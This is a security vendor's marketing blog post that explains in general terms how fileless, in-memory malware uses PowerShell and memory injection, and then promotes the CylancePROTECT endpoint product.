Fileless, Malwareless, In-Memory Malware… regardless of what trendy names these attacks are given by the press, they all share the same attack characteristics. Generally speaking, these attacks do not write files to disk, but rather, they exist and operate solely within system memory. They often utilize common admin tools such as PowerShell that are widely available yet rarely controlled on most enterprise systems. As a result, these attacks are often called ‘living off the land’ attacks as well.
Today’s Threat Spotlight blog by the Cylance Threat Guidance team highlights the technical details of two such malware families. Our endpoint protection product CylancePROTECT® uses artificial intelligence and machine learning to easily thwart these types of attacks in your enterprise.
Fileless malware is relatively sophisticated to build and deploy, and as a result, it is still relatively rare to encounter in the wild, but still poses a very real threat. It differentiates itself from most other malware by not leaving files on disk – hence its name. Instead, it uses a variety of tricks to stay resident in memory and execute commands that already exist on the machine.
Often, it uses a tool like PowerShell to coordinate the attacks and the use of a meterpreter payload that uses in-memory DLL injection stagers to set up additional attacks. As a result of not writing files to disk, it poses a very unique challenge to traditional security products that rely on inspecting files on disk in order to match a detection to a signature.
While most fileless attacks still rely on spam or spear phishing as the initial attack vector, we know that it is simply not realistic to block all email attachments in enterprise environments. Security controls should not be so restrictive that they compromise business operations, nor should they cause employees to attempt to circumvent them in order to carry out basic job duties like reading email.
CylancePROTECT uses multiple protection elements to stop this type of threat before it causes any damage. CylancePROTECT memory defense provides protection against process injection attack techniques, and the script control provides robust protection to prevent malicious scripts being used in concert with PowerShell.
If you don't have CylancePROTECT, contact us to learn how our artificial intelligence based solution can predict and prevent unknown and emerging threats before they ever execute.